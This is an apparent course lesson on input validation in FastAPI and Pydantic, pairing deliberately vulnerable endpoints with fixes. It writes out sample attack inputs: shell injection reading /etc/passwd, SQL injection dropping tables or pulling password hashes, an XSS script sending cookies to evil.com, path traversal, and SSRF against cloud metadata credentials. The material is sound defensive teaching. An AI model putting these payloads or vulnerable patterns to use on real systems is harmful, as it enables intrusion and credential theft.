Skip to main content

Input Validation and Sanitization - Trust No Input

Before you read any further, study this FastAPI endpoint and predict what an attacker could do:

from fastapi import FastAPI, Query
import subprocess

app = FastAPI()

@app.get("/lookup")
async def dns_lookup(hostname: str = Query(...)):
result = subprocess.run(
f"nslookup {hostname}",
shell=True,
capture_output=True,
text=True,
)
return {"output": result.stdout}

What happens when a user sends hostname=google.com; cat /etc/passwd? This is command injection, and it is one of at least six attack categories that input validation must prevent. By the end of this lesson, you will understand all of them and build validation layers that stop attacks before they reach your application logic.

What You Will Learn

  • Why input validation is a security boundary, not just a UX feature
  • How to use Pydantic field_validator and model_validator for security
  • How SQL injection works through string formatting (and why parameterized queries fix it)
  • How to prevent XSS (Cross-Site Scripting) with HTML escaping and Content Security Policy
  • How path traversal attacks bypass file access controls
  • How SSRF (Server-Side Request Forgery) turns your server into a proxy for attacks
  • Secure file upload validation patterns
  • How to build a complete validated form submission in FastAPI

Prerequisites

  • Pydantic models and validators (from Intermediate course)
  • FastAPI request handling (from Intermediate course)
  • Basic understanding of HTTP and HTML
  • pip install pydantic bleach python-magic

Part 1 - The Trust Boundary

Every piece of data that crosses a trust boundary - from user to server - is potentially malicious. This includes:

  • Query parameters, path parameters, request bodies
  • HTTP headers (including User-Agent, Referer, cookies)
  • File uploads (name, content, MIME type)
  • Data from databases (second-order injection)
  • Data from third-party APIs

The principle is simple: validate on input, encode on output.

Part 2 - Pydantic Validators as Security Guards

field_validator for Individual Fields

import re
from pydantic import BaseModel, field_validator

class UserRegistration(BaseModel):
username: str
email: str
bio: str

@field_validator("username")
@classmethod
def validate_username(cls, v: str) -> str:
# Length check
if not 3 <= len(v) <= 30:
raise ValueError("Username must be 3-30 characters")
# Whitelist: only alphanumeric and underscores
if not re.match(r"^[a-zA-Z0-9_]+$", v):
raise ValueError("Username can only contain letters, numbers, underscores")
# Blacklist known dangerous patterns
if v.lower() in {"admin", "root", "system", "null", "undefined"}:
raise ValueError("This username is reserved")
return v.lower() # Normalize to lowercase

@field_validator("email")
@classmethod
def validate_email(cls, v: str) -> str:
# Basic structural validation
if not re.match(r"^[a-zA-Z0-9._\%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$", v):
raise ValueError("Invalid email format")
# Prevent email header injection
if any(c in v for c in ["\r", "\n", "\x00"]):
raise ValueError("Invalid characters in email")
return v.lower()

@field_validator("bio")
@classmethod
def validate_bio(cls, v: str) -> str:
if len(v) > 500:
raise ValueError("Bio must be 500 characters or fewer")
# Strip null bytes (used in null byte injection)
v = v.replace("\x00", "")
return v

# Test it
try:
user = UserRegistration(
username="admin",
bio="Hello",
)
except ValueError as e:
print(e)
# 1 validation error for UserRegistration
# username
# Value error, This username is reserved

model_validator for Cross-Field Validation

from pydantic import BaseModel, model_validator

class PasswordChange(BaseModel):
current_password: str
new_password: str
confirm_password: str

@model_validator(mode="after")
def validate_passwords(self):
if self.new_password != self.confirm_password:
raise ValueError("Passwords do not match")
if self.new_password == self.current_password:
raise ValueError("New password must differ from current password")
if len(self.new_password) < 12:
raise ValueError("Password must be at least 12 characters")
return self

Constrained Types

Pydantic provides built-in constraints that eliminate entire classes of invalid input:

from pydantic import BaseModel, Field, constr, conint

class CourseQuery(BaseModel):
# String with regex pattern and length limits
search: constr(
min_length=1,
max_length=100,
pattern=r"^[a-zA-Z0-9\s\-]+$",
) = ""

# Integer with strict bounds
page: conint(ge=1, le=1000) = 1
page_size: conint(ge=1, le=100) = 20

# Enum-like restriction via Literal
sort_by: str = Field(default="name", pattern=r"^(name|date|price)$")
sort_order: str = Field(default="asc", pattern=r"^(asc|desc)$")
tip

Prefer whitelisting (define what is allowed) over blacklisting (define what is blocked). Whitelists are finite and complete; blacklists are infinite and always incomplete. A regex like ^[a-zA-Z0-9_]+$ is a whitelist. A regex that tries to block <script> is a blacklist.

Part 3 - SQL Injection via String Formatting

SQL injection remains one of the most common and devastating vulnerabilities. It occurs when user input is concatenated into SQL strings:

# VULNERABLE - string concatenation
async def get_user(username: str, db):
query = f"SELECT * FROM users WHERE username = '{username}'"
result = await db.execute(query)
return result.fetchone()

# Attack: username = "' OR '1'='1' --"
# Resulting SQL: SELECT * FROM users WHERE username = '' OR '1'='1' --'
# This returns ALL users in the database

# Attack: username = "'; DROP TABLE users; --"
# Resulting SQL: SELECT * FROM users WHERE username = ''; DROP TABLE users; --'
# This DELETES the entire users table
# FIXED - parameterized query
from sqlalchemy import text

async def get_user(username: str, db):
query = text("SELECT * FROM users WHERE username = :username")
result = await db.execute(query, {"username": username})
return result.fetchone()

# The database driver treats the parameter as a DATA value, never as SQL code
# Attack input "' OR '1'='1' --" is treated as the literal username string
danger

Never use f-strings, .format(), or % string formatting to build SQL queries. Always use parameterized queries. This rule has zero exceptions.

This topic is covered in full depth in Lesson 05 - SQL Injection Prevention. Here we focus on the validation layer that sits before the query layer.

from pydantic import BaseModel, field_validator

class UserLookup(BaseModel):
username: str

@field_validator("username")
@classmethod
def validate_username(cls, v: str) -> str:
# Defense in depth: validate BEFORE it reaches the query layer
if not re.match(r"^[a-zA-Z0-9_]{3,30}$", v):
raise ValueError("Invalid username format")
return v

Part 4 \text{---} XSS Prevention (Cross-Site Scripting)

XSS occurs when an attacker injects JavaScript into a web page that is viewed by other users:

# VULNERABLE \text{---} rendering user input as HTML without escaping
@app.get("/profile/{username}")
async def profile(username: str, db):
user = await db.get_user(username)
return f"""
<html>
<body>
<h1>Profile: {user.name}</h1>
<p>Bio: {user.bio}</p>
</body>
</html>
"""
# If user.bio = '<script>document.location="https://evil.com/?c="+document.cookie</script>'
# The script executes in every visitor's browser, stealing their cookies

Fix 1: HTML Escaping

import html

@app.get("/profile/{username}")
async def profile(username: str, db):
user = await db.get_user(username)
safe_name = html.escape(user.name)
safe_bio = html.escape(user.bio)
return f"""
<html>
<body>
<h1>Profile: {safe_name}</h1>
<p>Bio: {safe_bio}</p>
</body>
</html>
"""
# html.escape converts < to &lt; > to &gt; " to &quot; & to &amp;
# The script tag becomes visible text, not executable code

Fix 2: Sanitize Rich Text with bleach

When you need to allow some HTML (e.g., bold, italic) but block dangerous tags:

import bleach

ALLOWED_TAGS = ["b", "i", "em", "strong", "a", "p", "br", "ul", "ol", "li"]
ALLOWED_ATTRS = {"a": ["href", "title"]}
ALLOWED_PROTOCOLS = ["https"]

def sanitize_html(raw_html: str) -> str:
"""Allow safe HTML tags, strip everything else."""
return bleach.clean(
raw_html,
tags=ALLOWED_TAGS,
attributes=ALLOWED_ATTRS,
protocols=ALLOWED_PROTOCOLS,
strip=True,
)

# Test
dirty = '<p>Hello <script>alert("xss")</script> <b>world</b></p>'
clean = sanitize_html(dirty)
print(clean)
# <p>Hello alert("xss") <b>world</b></p>
# The script tag is stripped, the b tag is preserved

Fix 3: Content Security Policy Header

CSP is a defense-in-depth header that tells the browser which sources of content are trusted:

from fastapi import FastAPI
from fastapi.middleware.trustedhost import TrustedHostMiddleware
from starlette.middleware.base import BaseHTTPMiddleware
from starlette.requests import Request
from starlette.responses import Response

class CSPMiddleware(BaseHTTPMiddleware):
async def dispatch(self, request: Request, call_next):
response = await call_next(request)
response.headers["Content-Security-Policy"] = (
"default-src 'self'; "
"script-src 'self'; " # Only scripts from our domain
"style-src 'self' 'unsafe-inline'; "
"img-src 'self' https:; "
"connect-src 'self' https://api.engineersofai.com; "
"frame-ancestors 'none'; " # Prevent clickjacking
"base-uri 'self'; "
"form-action 'self'"
)
return response

app = FastAPI()
app.add_middleware(CSPMiddleware)
note

For API-only backends (JSON responses), XSS is less of a direct risk because browsers do not render JSON as HTML. However, if any endpoint returns HTML or if API responses are rendered in a frontend template, XSS is a real threat. Always escape output.

Part 5 \text{---} Path Traversal Attacks

Path traversal occurs when an attacker manipulates file paths to access files outside the intended directory:

import os

# VULNERABLE \text{---} user controls the file path
@app.get("/files/{filename}")
async def get_file(filename: str):
filepath = f"/app/uploads/{filename}"
with open(filepath, "r") as f:
return {"content": f.read()}

# Attack: filename = "../../etc/passwd"
# Resulting path: /app/uploads/../../etc/passwd = /etc/passwd
# The attacker reads the system password file

# Attack: filename = "....//....//etc/passwd"
# Some naive filters only check for "../" once
import os
from pathlib import Path
from fastapi import HTTPException

UPLOAD_DIR = Path("/app/uploads").resolve()

@app.get("/files/{filename}")
async def get_file(filename: str):
# Validate filename: no path separators, no special sequences
if "/" in filename or "\\" in filename or ".." in filename:
raise HTTPException(status_code=400, detail="Invalid filename")

filepath = (UPLOAD_DIR / filename).resolve()

# CRITICAL: Verify the resolved path is inside the upload directory
if not filepath.is_relative_to(UPLOAD_DIR):
raise HTTPException(status_code=400, detail="Path traversal detected")

if not filepath.is_file():
raise HTTPException(status_code=404, detail="File not found")

with open(filepath, "r") as f:
return {"content": f.read()}

Pydantic Validator for Safe Filenames

import re
from pydantic import BaseModel, field_validator

class FileRequest(BaseModel):
filename: str

@field_validator("filename")
@classmethod
def validate_filename(cls, v: str) -> str:
# Strip path separators and null bytes
v = v.replace("\x00", "")

# Whitelist: alphanumeric, hyphens, underscores, single dot for extension
if not re.match(r"^[a-zA-Z0-9_-]+\.[a-zA-Z0-9]+$", v):
raise ValueError(
"Filename must be alphanumeric with a single extension"
)

# Block known dangerous names
basename = v.split(".")[0].lower()
if basename in {"con", "prn", "aux", "nul", "com1", "lpt1"}:
raise ValueError("Reserved filename")

return v

Part 6 - SSRF (Server-Side Request Forgery)

SSRF occurs when an attacker tricks your server into making requests to internal resources:

import httpx

# VULNERABLE - user controls the URL
@app.post("/fetch-url")
async def fetch_url(url: str):
async with httpx.AsyncClient() as client:
response = await client.get(url)
return {"content": response.text}

# Attack: url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
# On AWS, this fetches the instance's IAM credentials from the metadata service

# Attack: url = "http://localhost:6379/INFO"
# This queries internal Redis, potentially exposing data

# Attack: url = "http://internal-admin-panel:8080/users"
# This accesses internal services not exposed to the internet
import ipaddress
from urllib.parse import urlparse
import socket
from fastapi import HTTPException
import httpx

BLOCKED_NETWORKS = [
ipaddress.ip_network("10.0.0.0/8"),
ipaddress.ip_network("172.16.0.0/12"),
ipaddress.ip_network("192.168.0.0/16"),
ipaddress.ip_network("127.0.0.0/8"),
ipaddress.ip_network("169.254.0.0/16"), # AWS metadata
ipaddress.ip_network("::1/128"),
]

ALLOWED_SCHEMES = {"https"} # Only HTTPS

def validate_url(url: str) -> str:
"""Validate a URL is safe for server-side fetching."""
parsed = urlparse(url)

# Check scheme
if parsed.scheme not in ALLOWED_SCHEMES:
raise HTTPException(status_code=400, detail="Only HTTPS URLs allowed")

# Check hostname is not empty
if not parsed.hostname:
raise HTTPException(status_code=400, detail="Invalid URL")

# Resolve hostname to IP and check against blocked networks
try:
ip = ipaddress.ip_address(socket.gethostbyname(parsed.hostname))
except (socket.gaierror, ValueError):
raise HTTPException(status_code=400, detail="Cannot resolve hostname")

for network in BLOCKED_NETWORKS:
if ip in network:
raise HTTPException(
status_code=400,
detail="URL resolves to a blocked network",
)

return url

@app.post("/fetch-url")
async def fetch_url(url: str):
safe_url = validate_url(url)
async with httpx.AsyncClient(
follow_redirects=False, # Prevent redirect to internal services
timeout=5.0,
) as client:
response = await client.get(safe_url)
return {"content": response.text[:10000]} # Limit response size
danger

SSRF is one of the most dangerous server-side vulnerabilities. On cloud infrastructure, it can expose cloud metadata credentials (AWS IAM, GCP service accounts) leading to complete cloud account takeover. Always validate URLs server-side and block private/internal IP ranges.

Part 7 - File Upload Validation

File uploads require multiple layers of validation - the filename, MIME type, file content, and file size can all be vectors for attack:

import os
import uuid
import magic # python-magic
from pathlib import Path
from fastapi import FastAPI, UploadFile, HTTPException

UPLOAD_DIR = Path("/app/uploads")
MAX_FILE_SIZE = 5 * 1024 * 1024 # 5 MB
ALLOWED_MIME_TYPES = {
"image/jpeg",
"image/png",
"image/webp",
"application/pdf",
}
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".webp", ".pdf"}

async def validate_upload(file: UploadFile) -> tuple[bytes, str]:
"""Validate an uploaded file for security."""

# 1. Check filename
if not file.filename:
raise HTTPException(status_code=400, detail="No filename provided")

ext = Path(file.filename).suffix.lower()
if ext not in ALLOWED_EXTENSIONS:
raise HTTPException(
status_code=400,
detail=f"File extension '{ext}' not allowed",
)

# 2. Read content with size limit
content = await file.read()
if len(content) > MAX_FILE_SIZE:
raise HTTPException(
status_code=400,
detail=f"File exceeds {MAX_FILE_SIZE // 1024 // 1024}MB limit",
)

if len(content) == 0:
raise HTTPException(status_code=400, detail="Empty file")

# 3. Detect actual MIME type from file content (not from the header)
detected_mime = magic.from_buffer(content, mime=True)
if detected_mime not in ALLOWED_MIME_TYPES:
raise HTTPException(
status_code=400,
detail=f"Detected file type '{detected_mime}' not allowed",
)

# 4. Verify extension matches detected type
mime_extension_map = {
"image/jpeg": {".jpg", ".jpeg"},
"image/png": {".png"},
"image/webp": {".webp"},
"application/pdf": {".pdf"},
}
expected_extensions = mime_extension_map.get(detected_mime, set())
if ext not in expected_extensions:
raise HTTPException(
status_code=400,
detail="File extension does not match detected content type",
)

return content, detected_mime

@app.post("/upload")
async def upload_file(file: UploadFile):
content, mime_type = await validate_upload(file)

# Generate a random filename to prevent path traversal and overwrites
safe_filename = f"{uuid.uuid4()}{Path(file.filename).suffix.lower()}"
filepath = UPLOAD_DIR / safe_filename

with open(filepath, "wb") as f:
f.write(content)

return {
"filename": safe_filename,
"size": len(content),
"type": mime_type,
}
tip

Never trust the Content-Type header or the file extension provided by the client. Both can be spoofed. Always detect the actual file type from the file's content using a library like python-magic, which inspects the file's magic bytes (header signature).

Part 8 - Command Injection Prevention

Returning to the opening puzzle, command injection occurs when user input is passed to a shell command:

import subprocess

# VULNERABLE - shell=True with user input
@app.get("/lookup")
async def dns_lookup(hostname: str):
result = subprocess.run(
f"nslookup {hostname}",
shell=True, # <-- The root cause
capture_output=True,
text=True,
)
return {"output": result.stdout}

# Attack: hostname = "google.com; cat /etc/passwd"
# The shell interprets the ; as a command separator
import subprocess
import re
from fastapi import HTTPException

# FIXED - validate input AND avoid shell=True
@app.get("/lookup")
async def dns_lookup(hostname: str):
# Strict hostname validation
if not re.match(r"^[a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?(\.[a-zA-Z]{2,})+$", hostname):
raise HTTPException(status_code=400, detail="Invalid hostname format")

result = subprocess.run(
["nslookup", hostname], # List form \text{---} no shell interpretation
capture_output=True,
text=True,
timeout=5,
)
return {"output": result.stdout}
danger

Never use shell=True with user-controlled input. Pass commands as a list to subprocess.run(), which bypasses the shell entirely. Each element in the list is treated as a literal argument, not parsed for shell metacharacters like ;, |, &&, or backticks.

Part 9 \text{---} Real-World: Validated Form Submission in FastAPI

Putting it all together \text{---} a complete course submission form with comprehensive input validation:

import re
import html
from decimal import Decimal
from typing import Annotated

from pydantic import BaseModel, Field, field_validator, model_validator
from fastapi import FastAPI, Depends, HTTPException, UploadFile
from enum import Enum

class CourseLevel(str, Enum):
beginner = "beginner"
intermediate = "intermediate"
advanced = "advanced"

class CourseSubmission(BaseModel):
title: Annotated[str, Field(min_length=5, max_length=200)]
description: Annotated[str, Field(min_length=20, max_length=5000)]
level: CourseLevel
price: Annotated[Decimal, Field(ge=0, le=999.99)]
tags: list[str] = Field(default_factory=list, max_length=10)
external_url: str | None = None

@field_validator("title")
@classmethod
def validate_title(cls, v: str) -> str:
# Remove null bytes
v = v.replace("\x00", "")
# Whitelist printable characters
if not re.match(r"^[\w\s\-:,.'!?()]+$", v):
raise ValueError("Title contains invalid characters")
# Normalize whitespace
v = " ".join(v.split())
return v

@field_validator("description")
@classmethod
def validate_description(cls, v: str) -> str:
v = v.replace("\x00", "")
# Escape HTML to prevent stored XSS
v = html.escape(v)
return v

@field_validator("tags")
@classmethod
def validate_tags(cls, v: list[str]) -> list[str]:
validated = []
for tag in v:
tag = tag.strip().lower()
if not re.match(r"^[a-z0-9\-]{2,30}$", tag):
raise ValueError(f"Invalid tag format: '{tag}'")
validated.append(tag)
# Remove duplicates
return list(dict.fromkeys(validated))

@field_validator("external_url")
@classmethod
def validate_external_url(cls, v: str | None) -> str | None:
if v is None:
return v
from urllib.parse import urlparse
parsed = urlparse(v)
if parsed.scheme not in ("https",):
raise ValueError("Only HTTPS URLs are allowed")
if not parsed.hostname:
raise ValueError("Invalid URL")
# Block internal hostnames
blocked = {"localhost", "127.0.0.1", "0.0.0.0", "internal"}
if parsed.hostname in blocked:
raise ValueError("Internal URLs are not allowed")
return v

@model_validator(mode="after")
def validate_price_for_level(self):
if self.level == CourseLevel.beginner and self.price > 0:
raise ValueError("Beginner courses must be free")
return self

@app.post("/api/courses")
async def create_course(course: CourseSubmission):
# At this point, all inputs are validated and safe
return {"message": "Course created", "title": course.title}

Key Takeaways

  • Trust no input \text{---} every piece of data from outside your application is potentially malicious
  • Use Pydantic field_validator and model_validator as the first line of defense
  • Prefer whitelisting (allow known-good patterns) over blacklisting (block known-bad patterns)
  • Never build SQL queries with string concatenation \text{---} always use parameterized queries
  • Prevent XSS with HTML escaping (html.escape), sanitization (bleach), and CSP headers
  • Prevent path traversal by resolving paths and verifying they stay inside the intended directory
  • Prevent SSRF by validating URLs and blocking private IP ranges before making server-side requests
  • Prevent command injection by using subprocess.run() with a list of arguments, never shell=True
  • Validate file uploads by checking content type (magic bytes), not just the extension or header
  • Defense in depth: validate at the boundary (Pydantic), parameterize queries, escape output

Graded Practice Challenges

Level 1 \text{---} Identify the Vulnerability

Question 1: What attack does this code enable?

@app.get("/search")
async def search(q: str, db):
results = await db.execute(f"SELECT * FROM courses WHERE title LIKE '\%{q}\%'")
return results.fetchall()
Answer

SQL injection. The query parameter q is directly interpolated into the SQL string. An attacker can send q = \%' UNION SELECT username, password_hash FROM users -- to extract the entire users table. Fix: use parameterized queries: text("SELECT * FROM courses WHERE title LIKE :q") with {"q": f"\%{q}\%"}.

Question 2: A developer validates file uploads by checking file.content_type == "image/png". Why is this insufficient?

Answer

The content_type is set by the client in the HTTP request header. An attacker can upload a PHP webshell or an executable file while setting the Content-Type header to image/png. The server accepts it as a "PNG" without inspecting the actual content. Always detect the MIME type from the file's content using a library like python-magic, which reads the magic bytes.

Question 3: What is the vulnerability in this URL validation?

def is_safe_url(url: str) -> bool:
return not url.startswith("http://localhost")
Answer

Multiple bypasses: (1) http://127.0.0.1 is the same as localhost but passes the check. (2) http://[::1] (IPv6 loopback) passes. (3) http://0x7f000001 (hex IP) may resolve to 127.0.0.1. (4) http://localHOST (case variation) passes. (5) http://evil.com could redirect to localhost. Always resolve the hostname to an IP address and check it against blocked network ranges, not string patterns.

Level 2 \text{---} Fix the Vulnerability

This user profile update endpoint has multiple security issues. Fix all of them:

@app.put("/profile")
async def update_profile(
name: str,
website: str,
avatar_url: str,
bio: str,
db,
):
await db.execute(
f"UPDATE users SET name='{name}', website='{website}', "
f"avatar_url='{avatar_url}', bio='{bio}' "
f"WHERE id={current_user.id}"
)
return {"name": name, "bio": bio}
Solution
from pydantic import BaseModel, Field, field_validator, HttpUrl
from sqlalchemy import text
import html
import re

class ProfileUpdate(BaseModel):
name: str = Field(min_length=1, max_length=100)
website: HttpUrl | None = None
avatar_url: HttpUrl | None = None
bio: str = Field(max_length=1000, default="")

@field_validator("name")
@classmethod
def validate_name(cls, v: str) -> str:
v = v.replace("\x00", "")
if not re.match(r"^[\w\s\-'.]+$", v):
raise ValueError("Name contains invalid characters")
return " ".join(v.split()) # Normalize whitespace

@field_validator("bio")
@classmethod
def sanitize_bio(cls, v: str) -> str:
return html.escape(v.replace("\x00", ""))

@field_validator("website", "avatar_url")
@classmethod
def validate_urls(cls, v):
if v is not None and str(v).startswith("http://"):
raise ValueError("Only HTTPS URLs are allowed")
return v

@app.put("/profile")
async def update_profile(profile: ProfileUpdate, db):
await db.execute(
text(
"UPDATE users SET name=:name, website=:website, "
"avatar_url=:avatar_url, bio=:bio WHERE id=:user_id"
),
{
"name": profile.name,
"website": str(profile.website) if profile.website else None,
"avatar_url": str(profile.avatar_url) if profile.avatar_url else None,
"bio": profile.bio,
"user_id": current_user.id,
},
)
return {"name": profile.name, "bio": profile.bio}

Fixes: (1) Pydantic model for structured validation. (2) Parameterized SQL. (3) HTML escaping on bio. (4) URL validation with HTTPS enforcement. (5) Length limits. (6) Null byte removal. (7) Name character whitelist.

Level 3 - Design a Secure System

Design an input validation architecture for a user-generated content platform where:

  • Users can submit articles with rich-text formatting (bold, italic, links, images)
  • Articles can embed external images and YouTube videos
  • Users can upload PDF attachments (max 10MB)
  • Articles are searchable via full-text search
  • The platform serves 50,000 articles and 1M page views per day

Document your validation strategy for: rich-text content, embedded media, file uploads, search queries, and how you handle second-order injection (malicious content retrieved from the database and rendered).

Design Hints
  1. Rich text: Accept content in Markdown (not raw HTML). Parse Markdown server-side with a strict parser that strips unknown elements. If HTML is needed, use bleach with a minimal whitelist of tags and attributes.
  2. Embedded media: Whitelist allowed domains for images (imgur.com, engineersofai.com) and videos (youtube.com, vimeo.com). Validate URLs via SSRF checks. Proxy external images through your CDN to prevent tracking pixels.
  3. File uploads: Validate PDFs by checking magic bytes (%PDF). Use a separate storage bucket with no execute permissions. Scan with ClamAV for malware. Generate a random filename.
  4. Search: Parameterize all search queries. Limit query length to 200 characters. Use PostgreSQL's to_tsquery with parameterized input, never string concatenation.
  5. Second-order injection: Escape output at render time, not just at input time. Use template engines with auto-escaping (Jinja2 with autoescape=True). Store raw content in the database, escape when rendering.
  6. Rate limiting: Limit article submissions to 10/hour per user. Limit search to 60/minute per IP.

What's Next

In the next lesson, SQL Injection Prevention, you will take a deep dive into SQL injection - understanding how UNION attacks, blind injection, and second-order injection work, and how to audit an entire SQLAlchemy codebase for vulnerabilities.

© 2026 EngineersOfAI. All rights reserved.